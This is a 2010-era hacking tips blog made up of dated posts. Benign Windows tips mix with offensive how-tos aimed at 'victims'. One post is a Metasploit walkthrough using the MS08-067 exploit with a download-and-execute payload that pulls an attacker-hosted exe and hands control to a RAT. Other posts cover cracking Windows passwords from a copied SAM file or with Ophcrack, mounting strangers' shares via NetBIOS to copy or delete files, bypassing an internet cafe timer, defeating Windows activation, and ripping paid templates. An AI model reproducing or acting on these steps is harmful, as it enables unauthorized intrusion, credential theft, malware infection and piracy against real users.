    3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

    - Record Banners And Take Note Of The Application Running and The Version Number
    - Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
    - Make a copy of some Proof-Of-Concept code for the vulnerability.

    *Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

    - Run The Exploit Against The slave.
    - Reap The Cheap-Sh0t Ownage
    __________________________________________________ _______________
    **This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**

    Sunday, September 26, 2010

    Unlimited time on internet cafe

    This tutorial will show you how to disable the timer on the computers in Internet Cafe.

    First of all create a new Text Document. Then write "CMD" in it, without the quotes and then save it as "anything.bat". (Make sure you're file is .bat)

    Now go to the location where you saved the batch, and run it. If you've done it correctly, you'll see that CMD (Command Prompt) will open.

    Now, write in the CMD: "cd\windows" without the quotes. (This will change the directory to WINDOWS). Then type "regedit" without the quotes and regedit editor should open.

    Now navigate to:
    HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current version>internet settings>policies>system

    Then on the right pane where it says "Disable Taskmanager", right click on it and scroll down to modify, then change the value of it to "0". Then open Task Manager (CTRL+ALT+DELETE or CTRL+SHIFT+ESCAPE) and disable the Internet Cafe's timer.


    If you did this right, you're done. Oui

    Well done and good luck doing this.

    Wednesday, September 22, 2010

    Crack XP/vista/windows 7 passwords

    1) Go to http://www.ubuntu.com and order a free copy of Ubuntu
    2) Turn the computer on, insert the disk containing Ubuntu then reboot and press F12 repeatedly
    3) It will go to the Ubuntu boot screen. Select the top option.
    4) When Ubuntu has started, go into Places>Computer>Local Disk>Windows>system32 and copy the folder labelled "config" onto your thumbdrive. (alternatively, this can be Places>Filesystem>media>disk>Windows>System32>config).
    5) Go home and download a copy of LCP from http://www.soft32.com/Download/Free/LCP/4-79440-1.html and install it.
    6) Start LCP and go to Import>Import from SAM File... and browse to the config folder which has been saved on your thumbdrive, open the SAM file.
    7) Below in the dialogue box, it has something about a system file. Press the little button next to the system file name box that has ... on it. Import the system file from the config folder.
    8) Click OK
    9) Go to Options>Brute Force Attack>Character Set. Change the character set to the set at the bottom of the list.
    10) Click OK
    11) Press F4 and watch your Administrator's password be revealed, hopefully within a matter of seconds.

    Thursday, September 16, 2010

    Shutdown with notepad

    The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

    To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
    In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
    You have to use at least one switch for the shutdown command to work.

    The Switches :-
    The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

    -i: Display GUI interface, must be the first option
    -l: Log off (cannot be used with -m option)
    -s: Shutdown the computer
    -r: Shutdown and restart the computer
    -a: Abort a system shutdown
    -m \\computername: Remote computer to shutdown/restart/abort
    -t xx: Set timeout for shutdown to xx seconds
    -c “comment”: Shutdown comment (maximum of 127 characters)
    -f: Forces running applications to close without warning
    -d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

    Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
    If you are having trouble try using a '/' in place of '-' in your switches.

    Examples :-
    shutdown –m \\computername –r –f
    This command will restart the computer named computername and force any programs that might still be running to stop.

    shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
    This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

    shutdown –m \\computername –a
    This command will abort a previous shutdown command that is in progress.

    Using A Batch File :-
    You can create a file that performs the shutdown command on many computers at one time.

    In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

    Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
    Make sure each shutdown command is on its own line.
    An example of what should be typed in notepad is given below-

    shutdown –m \\computer1 –s
    shutdown –m \\computer2 –s
    shutdown –m \\computer3 -s

    Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.
    Pick the location to save the batch file in and save it.

    When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.

    You can use any combination of shutdown commands in a batch file.

    Sunday, September 5, 2010

    HOow to make autorun CD file

    If you wanna make a autorun file for that CD you are ready to burn just read this...

    1) You open notepad

    2) now you writ: [autorun]
    OPEN=INSTALL\Setup_filename.EXE
    ICON=INSTALL\Setup_filename.EXE

    Now save it but not as a .txt file but as a .inf file.

    But remember! The "Setup_filename.EXE" MUST be replaced with the name of the setup file. And you also need to rember that it is not all of the setup files there are called '.exe but some are called '.msi

    3) Now burn your CD with the autorun .inf file included.

    4) Now set the CD in you CD drive and wait for the autorun to begin or if nothing happens just double-click on the CD drive in

    Friday, September 3, 2010

    HOw to Rip Flash Template

    1. browse or search your favorite dynamic flash template in TM website. If you got one... click the "view" link and new window will open with dynamic flash.. loading...

    2. If the movie fully loaded, click View -> Source in your browser to bring the source code of the current page and in the source code, search for "IFRAME" and you will see the iframe page. In this example were going to try the 7045 dynamic template. get the URL(ex.
    http://images.templatemonster.com/screen...7045.html) then paste it to your browser... easy eh? wait! dont be to excited... erase the .html and change it to swf then press enter then you'll see the flash movie again icon_smile.gif.

    3. copy the URL and download that SWF file.. use your favorite download manager.. mine I used flashget icon_smile.gif NOTE: dont close the browser we may need that later on.

    4. open your Sothink SWF decompiler... click "Quick Open" then browse where you download your SWF/movie file. Click Export FLA to export your SWF to FLA, in short, save it as FLA icon_smile.gif

    5. Open your Macromedia FLash and open the saved FLA file. press Control+Enter or publish the file... then wallah! the output window will come up with "Error opening URL." dont panic, that error will help you where to get the remaining files.

    6. Copy the first error, example: "7045_main.html" then go back to your browser and replace the 7045.swf to 7045_main.html press enter and you'll see a lot of text... nonsense text icon_lol.gif that text are your contents...

    NOTE: when you save the remaining files dont forget to save with underscore sign (_) in the front on the file without the TM item number (e.g. 7045) if it is html save it as "_main.html" and same with the image save it as "_works1.jpg" save them where you save the FLA and SWF files. Continue browsing the file inside Flash application so you can track the remaining files... do the same until you finish downloading all the remaining the files.

    Tuesday, August 24, 2010

    Use pendrive as RAM

    eBoostr™ is an alternative solution to Vista’s ReadyBoost and SuperFetch technologies now available on Windows XP .
    It speeds up your PC and improves application responsiveness by using flash memory and free RAM as an extra layer of performance-boosting cache for your PC. Use up to four inexpensive flash devices to speed up your system. Add more speed to your PC without any hardware upgrade!


    DOWNLOAD

    imran khan amplifier

    Wednesday, August 11, 2010

    Hacking through IP address

    Requirements:

    Nmap
    Metasploit

    First of all you need target ip of your victim.

    Then open Metasploit Console & type db_create.
    [Use: This’ll create or connect you to database.]

    Once you do that type Nmap.
    [Use: This’ll load Nmap in Metasploit Console]

    Next you need to type db_nmap -sT -sV
    [This’ll scan OS, Ports, and Services running on victim’s computer.]
    Wait for 5 min’s to complete its scan.
    Once done, Note down the OS, Ports, and Services running on victim’s computer.

    Now it’s time to exploit victim’s machine.
    Exploit depends on the OS, Ports, and Services running on victim’s computer.
    So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
    No matter weather they’re protected by any firewall or not.

    Now I’ll tell you exploiting:-

    Windows 2000 (all versions SP1, SP2, SP3, SP4)
    Windows XP (all versions SP1, SP2, SP3)

    Type show exploits
    [Use: This’ll show all the exploits in its database.]

    Next you need to type use windows/smb/ms08_067_netapi
    [Use: This’ll select the exploit windows/smb/ms08_067_netapi]

    Now Type show targets
    [Use: This’ll show all targets by exploit]

    Now Type set target 0
    [Use: This’ll set target to 0 specified]
    Then type show payloads
    [Use: This’ll bring up all the payloads]
    Next type set payload windows/download_exec
    [Use: This’ll set payload as windows/download_exec]

    Then Type show options
    [Use: This’ll show all options in the exploit & payload]
    In window you’ll see many options, in which you need to
    Fill only two options RHOST & URL.

    Type set RHOST
    [Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]

    Next Type set URL http://www.xxxx.com/xxx.exe
    [Use: This’ll set URL to your direct server link.]

    At last you need to type exploit
    [Use: This will launch your exploit & your victim will be infected.]

    You can now control you're victim with RAT.
    So, any versions of Win 2000-XP can be exploited easily.
    In case if you didn’t get this two OS’, immediately after Nmap scan
    You can use the command db_autopwn –p –t –e.
    In most cases you get a shell.

    Thursday, July 22, 2010

    Make your computer talk

    This is a visual basic script

    • Open notepad
    • And copy                
       Dim userInput


                                   userInput = InputBox("Write a message for me to say")


        Set Sapi = Wscript.CreateObject("SAPI.SpVoice")


      Sapi.speak userInput
    • And save file as .vbs
    • And open it and this will tell you your typed message  


    Monday, July 19, 2010

    delet undeletable files

    Delete An "undeletable" File

    Open a Command Prompt window and leave it open.
    Close all open programs.
    Click Start, Run and enter TASKMGR.EXE
    Go to the Processes tab and End Process on Explorer.exe.
    Leave Task Manager open.
    Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
    At the command prompt type DEL where is the file you wish to delete.
    Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
    Close Task Manager.


    Or you can try this

    Open Notepad.exe

    Click File>Save As..>

    locate the folder where ur undeletable file is

    Choose 'All files' from the file type box

    click once on the file u wanna delete so its name appears in the 'filename' box

    put a " at the start and end of the filename
    (the filename should have the extension of the undeletable file so it will overwrite it)

    click save,

    It should ask u to overwrite the existing file, choose yes and u can delete it as normal


    Here's a manual way of doing it. I'll take this off once you put into your first post zain.

    1. Start
    2. Run
    3. Type: command
    4. To move into a directory type: cd c:\*** (The stars stand for your folder)
    5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
    6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
    7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

    Thursday, July 8, 2010

    List of all shortcut of window

    Full list of Windows Shortcuts

    Run Commands:

    Quote:
    compmgmt.msc - Computer management
    devmgmt.msc - Device manager
    diskmgmt.msc - Disk management
    dfrg.msc - Disk defrag
    eventvwr.msc - Event viewer
    fsmgmt.msc - Shared folders
    gpedit.msc - Group policies
    lusrmgr.msc - Local users and groups
    perfmon.msc - Performance monitor
    rsop.msc - Resultant set of policies
    secpol.msc - Local security settings
    services.msc - Various Services
    msconfig - System Configuration Utility
    regedit - Registry Editor
    msinfo32 _ System Information
    sysedit _ System Edit
    win.ini _ windows loading information(also system.ini)
    winver _ Shows current version of windows
    mailto: _ Opens default email client
    command _ Opens command prompt

    Run Commands to access the control panel:

    Quote:
    Add/Remove Programs control appwiz.cpl
    Date/Time Properties control timedate.cpl
    Display Properties control desk.cpl
    FindFast control findfast.cpl
    Fonts Folder control fonts
    Internet Properties control inetcpl.cpl
    Keyboard Properties control main.cpl keyboard
    Mouse Properties control main.cpl
    Multimedia Properties control mmsys.cpl
    Network Properties control netcpl.cpl
    Password Properties control password.cpl
    Printers Folder control printers
    Sound Properties control mmsys.cpl sounds
    System Properties control sysdm.cpl

    Command Prompt:

    Quote:
    ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
    APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
    ARP Displays, adds, and removes arp information from network devices.
    ASSIGN Assign a drive letter to an alternate letter.
    ASSOC View the file associations.
    AT Schedule a time to execute commands or programs.
    ATMADM Lists connections and addresses seen by Windows ATM call manager.
    ATTRIB Display and change file attributes.
    BATCH Recovery console command that executes a series of commands in a file.
    BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
    BREAK Enable / disable CTRL + C feature.
    CACLS View and modify file ACL's.
    CALL Calls a batch file from another batch file.
    CD Changes directories.
    CHCP Supplement the International keyboard and character set information.
    CHDIR Changes directories.
    CHKDSK Check the hard disk drive running FAT for errors.
    CHKNTFS Check the hard disk drive running NTFS for errors.
    CHOICE Specify a listing of multiple options within a batch file.
    CLS Clears the screen.
    CMD Opens the command interpreter.
    COLOR Easily change the foreground and background color of the MS-DOS window.
    COMP Compares files.
    COMPACT Compresses and uncompress files.
    CONTROL Open control panel icons from the MS-DOS prompt.
    CONVERT Convert FAT to NTFS.
    COPY Copy one or more files to an alternate location.
    CTTY Change the computers input/output devices.
    DATE View or change the systems date.
    DEBUG Debug utility to create assembly programs to modify hardware settings.
    DEFRAG Re-arrange the hard disk drive to help with loading programs.
    DEL Deletes one or more files.
    DELETE Recovery console command that deletes a file.
    DELTREE Deletes one or more files and/or directories.
    DIR List the contents of one or more directory.
    DISABLE Recovery console command that disables Windows system services or drivers.
    DISKCOMP Compare a disk with another disk.
    DISKCOPY Copy the contents of one disk and place them on another disk.
    DOSKEY Command to view and execute commands that have been run in the past.
    DOSSHELL A GUI to help with early MS-DOS users.
    DRIVPARM Enables overwrite of original device drivers.
    ECHO Displays messages and enables and disables echo.
    EDIT View and edit files.
    EDLIN View and edit files.
    EMM386 Load extended Memory Manager.
    ENABLE Recovery console command to enable a disable service or driver.
    ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
    ERASE Erase files from computer.
    EXIT Exit from the command interpreter.
    EXPAND Expand a M*cros*ft Windows file back to it's original format.
    EXTRACT Extract files from the M*cros*ft Windows cabinets.
    FASTHELP Displays a listing of MS-DOS commands and information about them.
    FC Compare files.
    FDISK Utility used to create partitions on the hard disk drive.
    FIND Search for text within a file.
    FINDSTR Searches for a string of text within a file.
    FIXBOOT Writes a new boot sector.
    FIXMBR Writes a new boot record to a disk drive.
    FOR Boolean used in batch files.
    FORMAT Command to erase and prepare a disk drive.
    FTP Command to connect and operate on a FTP server.
    FTYPE Displays or modifies file types used in file extension associations.
    GOTO Moves a batch file to a specific label or location.
    GRAFTABL Show extended characters in graphics mode.
    HELP Display a listing of commands and brief explanation.
    IF Allows for batch files to perform conditional processing.
    IFSHLP.SYS 32-bit file manager.
    IPCONFIG Network command to view network adapter settings and assigned values.
    KEYB Change layout of keyboard.
    LABEL Change the label of a disk drive.
    LH Load a device driver in to high memory.
    LISTSVC Recovery console command that displays the services and drivers.
    LOADFIX Load a program above the first 64k.
    LOADHIGH Load a device driver in to high memory.
    LOCK Lock the hard disk drive.
    LOGON Recovery console command to list installations and enable administrator login.
    MAP Displays the device name of a drive.
    MD Command to create a new directory.
    MEM Display memory on system.
    MKDIR Command to create a new directory.
    MODE Modify the port or display settings.
    MORE Display one page at a time.
    MOVE Move one or more files from one directory to another directory.
    MSAV Early M*cros*ft Virus scanner.
    MSD Diagnostics utility.
    MSCDEX Utility used to load and provide access to the CD-ROM.
    NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
    NET Update, fix, or view the network or network settings
    NETSH Configure dynamic and static network information from MS-DOS.
    NETSTAT Display the TCP/IP network protocol statistics and information.
    NLSFUNC Load country specific information.
    NSLOOKUP Look up an IP address of a domain or host on a network.
    PATH View and modify the computers path location.
    PATHPING View and locate locations of network latency.
    PAUSE Command used in batch files to stop the processing of a command.
    PING Test / send information to another network computer or network device.
    POPD Changes to the directory or network path stored by the pushd command.
    POWER Conserve power with computer portables.
    PRINT Prints data to a printer port.
    PROMPT View and change the MS-DOS prompt.
    PUSHD Stores a directory or network path in memory so it can be returned to at any time.
    QBASIC Open the QBasic.
    RD Removes an empty directory.
    REN Renames a file or directory.
    RENAME Renames a file or directory.
    RMDIR Removes an empty directory.
    ROUTE View and configure windows network route tables.
    RUNAS Enables a user to execute a program on another computer.
    SCANDISK Run the scandisk utility.
    SCANREG Scan registry and recover registry from errors.
    SET Change one variable or string to another.
    SETLOCAL Enables local environments to be changed without affecting anything else.
    SETVER Change MS-DOS version to trick older MS-DOS programs.
    SHARE Installs support for file sharing and locking capabilities.
    SHIFT Changes the position of replaceable parameters in a batch program.
    SHUTDOWN Shutdown the computer from the MS-DOS prompt.
    SMARTDRV Create a disk cache in conventional memory or extended memory.
    SORT Sorts the input and displays the output to the screen.
    START Start a separate window in Windows from the MS-DOS prompt.
    SUBST Substitute a folder on your computer for another drive letter.
    SWITCHES Remove add functions from MS-DOS.
    SYS Transfer system files to disk drive.
    TELNET Telnet to another computer / device from the prompt.
    TIME View or modify the system time.
    TITLE Change the title of their MS-DOS window.
    TRACERT Visually view a network packets route across a network.
    TREE View a visual tree of the hard disk drive.
    TYPE Display the contents of a file.
    UNDELETE Undelete a file that has been deleted.
    UNFORMAT Unformat a hard disk drive.
    UNLOCK Unlock a disk drive.
    VER Display the version information.
    VERIFY Enables or disables the feature to determine if files have been written properly.
    VOL Displays the volume information about the designated drive.
    XCOPY Copy multiple files, directories, and/or drives from one location to another.
    TRUENAME When placed before a file, will display the whole directory in which it exists
    TASKKILL It allows you to kill those unneeded or locked up applications

    Windows XP Shortcuts:

    Quote:
    ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
    ALT+ENTER View properties for the selected item
    ALT+ESC Cycle through items in the order they were opened
    ALT+F4 Close the active item, or quit the active program
    ALT+SPACEBAR Display the System menu for the active window
    ALT+TAB Switch between open items
    ALT+Underlined letter Display the corresponding menu
    BACKSPACE View the folder one level up in My Computer or Windows Explorer
    CTRL+A Select all
    CTRL+B Bold
    CTRL+C Copy
    CTRL+I Italics
    CTRL+O Open an item
    CTRL+U Underline
    CTRL+V Paste
    CTRL+X Cut
    CTRL+Z Undo
    CTRL+F4 Close the active document
    CTRL while dragging Copy selected item
    CTRL+SHIFT while dragging Create shortcut to selected iteM
    CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
    CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
    CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
    CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
    SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
    ESC Cancel the current task
    F1 Displays Help
    F2 Rename selected item
    F3 Search for a file or folder
    F4 Display the Address bar list in My Computer or Windows Explorer
    F5 Refresh the active window
    F6 Cycle through screen elements in a window or on the desktop
    F10 Activate the menu bar in the active program
    SHIFT+F10 Display the shortcut menu for the selected item
    CTRL+ESC Display the Start menu
    SHIFT+CTRL+ESC Launches Task Manager
    SHIFT when you insert a CD Prevent the CD from automatically playing
    WIN Display or hide the Start menu
    WIN+BREAK Display the System Properties dialog box
    WIN+D Minimizes all Windows and shows the Desktop
    WIN+E Open Windows Explorer
    WIN+F Search for a file or folder
    WIN+F+CTRL Search for computers
    WIN+L Locks the desktop
    WIN+M Minimize or restore all windows
    WIN+R Open the Run dialog box
    WIN+TAB Switch between open items

    Windows Explorer Shortcuts:

    Quote:
    ALT+SPACEBAR - Display the current window’s system menu
    SHIFT+F10 - Display the item's context menu
    CTRL+ESC - Display the Start menu
    ALT+TAB - Switch to the window you last used
    ALT+F4 - Close the current window or quit
    CTRL+A - Select all items
    CTRL+X - Cut selected item(s)
    CTRL+C - Copy selected item(s)
    CTRL+V - Paste item(s)
    CTRL+Z - Undo last action
    CTRL+(+) - Automatically resize the columns in the right hand pane
    TAB - Move forward through options
    ALT+RIGHT ARROW - Move forward to a previous view
    ALT+LEFT ARROW - Move backward to a previous view
    SHIFT+DELETE - Delete an item immediately
    BACKSPACE - View the folder one level up
    ALT+ENTER - View an item’s properties
    F10 - Activate the menu bar in programs
    F6 - Switch between left and right panes
    F5 - Refresh window contents
    F3 - Display Find application
    F2 - Rename selected item

    Internet Explorer Shortcuts:

    Quote:
    CTRL+A - Select all items on the current page
    CTRL+D - Add the current page to your Favorites
    CTRL+E - Open the Search bar
    CTRL+F - Find on this page
    CTRL+H - Open the History bar
    CTRL+I - Open the Favorites bar
    CTRL+N - Open a new window
    CTRL+O - Go to a new location
    CTRL+P - Print the current page or active frame
    CTRL+S - Save the current page
    CTRL+W - Close current browser window
    CTRL+ENTER - Adds the http://www. (url) .com
    SHIFT+CLICK - Open link in new window
    BACKSPACE - Go to the previous page
    ALT+HOME - Go to your Home page
    HOME - Move to the beginning of a document
    TAB - Move forward through items on a page
    END - Move to the end of a document
    ESC - Stop downloading a page
    F11 - Toggle full-screen view
    F5 - Refresh the current page
    F4 - Display list of typed addresses
    F6 - Change Address bar and page focus
    ALT+RIGHT ARROW - Go to the next page
    SHIFT+CTRL+TAB - Move back between frames
    SHIFT+F10 - Display a shortcut menu for a link
    SHIFT+TAB - Move back through the items on a page
    CTRL+TAB - Move forward between frames
    CTRL+C - Copy selected items to the clipboard
    CTRL+V - Insert contents of the clipboard
    ENTER - Activate a selected link
    HOME - Move to the beginning of a document
    END - Move to the end of a document
    F1 - Display Internet Explorer Help

    Wednesday, June 30, 2010

    Ethical hacking netbios hacking(get access to another pc)

    THIS NETBIOS HACKING GUIDE WILL TELL YOU ABOUT HACKING REMOTE COMPUTER AND GAINING ACCESS TO IT’S HARD-DISK OR PRINTER.


    1.Open command prompt

    2. In the command prompt use the “net view” command
    ( OR YOU CAN ALSO USE “NB Scanner” OPTION IN “IP-TOOLS” SOFTWARE BY ENTERING RANGE OF IP ADDRESSS.BY THIS METHOD YOU CAN SCAN NUMBER OF COMPUTERS AT A TIME).

    Example: C:>net view \59.43.45.212

    The above is an example for operation using command prompt.”net view” is one of the netbios command to view the shared resources of the remote computer.Here “59.43.45.212? is an IP address of remote computer that is to be hacked through Netbios.You have to substitute a vlaid IP address in it’s place.If succeeded a list of HARD-DISK DRIVES & PRINTERS are shown.If not an error message is displayed. So repeat the procedure 2 with a different IP address.

    3. After succeeding, use the “net use” command in the command prompt.The “net use” is another netbios command which makes it possible to hack remote drives or printers.

    Example-1:
    C:>net use D: \59.43.45.212F
    Example-2:
    C:>net use G: \59.43.45.212SharedDocs
    Example-3:
    C:>net use I: \59.43.45.212Myprint

    NOTE: In Examples 1,2 & 3, D:,G: & I: are the Network Drive Names that are to be created on your computer to access remote computer’s hard-disk.

    NOTE: GIVE DRIVE NAMES THAT ARE NOT USED BY ANY OTHER DRIVES INCLUDING HARD-DISK DRIVES,FLOPPY DRIVES AND ROM-DRIVES ON YOUR COMPUTER.THAT IS IF YOU HAVE C: & D: AS HARD DIRVES, A: AS FLOPPY DIVE AND E: AS CD-DRIVE, GIVE F: AS YOUR SHARED DRIVE IN THE COMMAND PROMPT

    F:,”SharedDocs” are the names of remote computer’s hard-disk’s drives that you want to hack. “Myprint” is the name of remote computer’s printer.These are displayed after giving “net use” command. “59.43.45.212? is the IP address of remote computer that you want to hack.

    4. After succeeding your computer will give a message that “The command completed successfully“. Once you get the above message you are only one step away from hacking the computer.
    [ad code=1 align=center]
    Now open “My Computer” you will see a new “Hard-Disk drive”(Shared) with the specified name.You can open it and access remote computer’s Hard-Drive.You can copy files,music,folders etc. from victim’s hard-drive.You can delete/modify data on victim’s hard-drive only if WRITE-ACCESS is enabled on victim’s system.You can access filesfolders quickly through “Command Prompt”.

    NOTE: If Remote Computer’s Firewall Is Enabled Your Computer Will Not Succeed In Gaining Access To Remote Computer Through Netbios.That is Netbios Hacking Is Not Possible In This Situation.(An Error Message Is Displayed).So Repeat The Procedure 2,3 With Different IP Address.

    Saturday, June 19, 2010

    How to change Login background

    You will not need any programs or anything like that, just simply add the picture you want into the folder placed into the description under.

    --WINDOWS 7--
    If you have the folder "C:\Windows\System32\oobe\info\backgrounds"
    You can place a image inside backgrounds called "backgrounddefault" Use JPG, I'm not sure if png or any other file-types works.
    You will not have to Restart your computer.
    --

    --WINDOWS XP--
    For windows XP the folder you'll find it is:
    "C:\WINDOWS\system32\oobe\images"
    The name is either newmark1.jpg, newmark8.jpg or wpaback.jpg. Make sure you back up the old images before editing anything!
    --

    Ophcrack - Windows password cracker

     For Educational purpose only:
    Ophcrack is a Windows password cracker using rainbow tables.
    It recovers 99.9% of alphanumeric passwords in seconds.

    What do you need:
    1. Physical contact with the computer.
    2. CD or USB stick with Ophcrack on it.
    3. The computer must be able to boot from CD or USB stick (almost never a problem).
    (you don't need limited user access or anything else)

    How to use:
    (First download the image file from the provided link, and burn it to a CD.)
    After you have the Ophcrack Live CD:
    1. Make the computer you wanna crack in to boot from CD. For those who don't know how, just enter into the BIOS and search for a boot priority, just change the sequence to boot from CD first, save changes and exit.(if you don't know how to access the BIOS search google for it, also google may help with the boot priority).
    2. Enter the CD and reboot. It will boot up to linux, and you'll be able to handle it from there. It might ask you 'which partition' you wanna scan, and everything else will be done by itself. It will find the password for every user on that disk partition.
    3. Have fun!;)

    Download links:
    XP download
    Vista download

    crack windows 7 from geniune category


    Now perform these actions step by step

    1)Open your MY COMPUTER

    2)Open your windows installed drive i.e.,C://drive.

    3)Open WINDOWS folder

    4)In that open SYSTEM 32 folder

    5)Then search folder names as ;WAT (WINDOWS ACTIVATION TECHNOLOGIES)

    6)Delete that folder

    7)Automatically two files will be delete from that folder else two files will be remain standstill,it will not delete 'coz it is windows files.

    8)then RESTART your PC to take effect.

    Monday, June 14, 2010

    Clean virtuall memoru problem

    So, now that we're getting virtual memory errors all the time, it's about time we fix it! Just a warning ahead of time, however... this is going to require you to go into your registry editor. This is a risky business, messing around in registry editor, and if there are any errors, it could be fatal. I wrote a tutorial about LKGC (Last known good configuration) |HERE|, and would highly recommend you become familiar with it, as well. With that said, here ya go, Step-by-step!

    1. Go in to your Run prompt, by clicking Start, and then run.

    2. Type "regedit" then click OK, to enter your registry Editor.

    3. In the left pane, expand: HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Control > Session Manager > Memory Management

    4. In the right pane, double-click ClearPageFileAtShutdown. When the Edit DWORD Value window appears, Type 1 in the Value data field, then click OK..

    5. Exit Registry Editor

    6. Restart.

    Wednesday, June 9, 2010

    150 000 Universal Driver

    150 000 Universal Driver

     The File Is A CD/DVD Image With The File Format ".isz"

    You Will Need One Of The Following Programs For Burning/Mounting It


    1. UltraISO Premium Edition v9.0.0.2336

    2. Alcohol 120% v1.9.7

    3. Daemon Tools Pro Advanced v4.10.0218

    4. WinMount v3.2.0319

     http://hotfile.com/dl/44632101/45e1411/150000_Universal_Drivers_2009_By_CyberPro_CW.rar.html

    Netscape_World_No.1_Browser_Latest_Version 

     AOL has released a new of Netscape Browser - Speed, Flexibility and More Security Choices Than Any Other Browser. Based on Firefox, the Netscape Browser options and interface are similar, but brought to a superior level of accessibilty by filling some of the Firefox gaps, such as tabbed browsing, context menus and menu bars. The new Netscape Browser test build runs on two different browsing engines: the Mozilla Foundation's Gecko engine, which powers up the Mozilla, Firefox and older Netscape browsers, and Micr@soft's Internet Explorer engine.

    Since Navigator 9 is based on the newest Mozilla ® technologies, there are additional features in Navigator 9 that were not available in Netscape Browser 8.x. You can read about those new features in these release notes from Mozilla.
    Netscape Navigator 9.0 is a browser-only release. It does not contain an e-mail client, newsgroup reader, or HTML composer.

    The following features are new and unique to Netscape Navigator 9:
    • Visual Refresh. Netscape Navigator 9's theme has been updated to save screen-space and leave more room for the websites you visit.
    • URL Correction. Navigator 9 will automatically correct common typos in URLs. For example, if you accidentally type googlecom, Navigator will fix it be to google.com. The browser will watch for nearly 30 different types of common mistakes and correct them for you (asking you to confirm, if you choose to enable confirmation). No more .cmo, .ogr, or htp:// !
    • News Menu and Sidebar. The latest news is built right into the browser, under the News menu. Provided by Netscape.com, you can customize the menu to only contain the news sections you want to monitor. You can also open the News sidebar to always keep an eye on what's happening.
    • Link Pad. The Link Pad is a new sidebar feature that allows you to save links/URLs that you want to visit later without cluttering your bookmarks. Just drag a link over the Link Pad status bar icon and drop it to save it in the Link Pad. By default, clicking on an item in the Link Pad will open it in the browser and remove it from the list, saving you the step of deleting it.
    • News Tracker. The Netscape Tracker sidebar lets you monitor breaking news as it happens, via Netscape.com.
    • In-browser voting. Share your opinions with the world! The icons in the Navigator address bar let you share interesting stories you find and vote on stories shared by others.
    • Extension Compatibility. Navigator 9 shares an architecture with the latest Mozilla technologies; as such, Navigator 9 will let you install extensions that are compatible with Firefox ® 2.
    • Sidebar Mini Browser. You've always been able to have bookmarks open in the sidebar, but we've improved this functionality and extended it to all links, not just bookmarks. Additionally, we've added a navigation toolbar to the sidebar for even easier split-screened browsing. Just right-click on a link and select "Open Link in Sidebar" to get started!
    • Restart Netcape. A smalll but oft-requested feature: you can now restart Navigator (and keep your current tabs intact) by selecting "Restart Navigator" from the File menu.
    • Resizeable Textarea. Drag the bottom-right corners of text fields in forms to add more typing space.
    • Tab History. Opening a link in a new tab will give the new tab the same history as the source tab for a more seamless tabbed browsing experience.
    • OPML Support. Netscape Navigator supports importing and exporting your bookmarks in OPML, a popular format for sharing lists of newsfeeds.
    • Throbber. By popular demand, the Netscape 7-style throbber is back. Click on it any time to visit Netscape.com.
    • Combined Stop/Reload button. To save space in your toolbar, we've combined the stop and reload buttons. Because you never need both at the same time, the toolbar will only show the relevant half of the pair.
    • Friends' Activity Sidebar. If you are a member at Netscape.com, you can keep tabs on what your friends find interesting. This sidebar lets you view your friends latest votes, comments, and story submissions.
    • Sitemail Notification. This icon will sport an exclamation point when you have new Netscape.com sitemail messages waiting for you. 

     http://hotfile.com/dl/44808796/5e0f1e3/Netscape_World_No.1_Browser_Latest_Version_.rar.html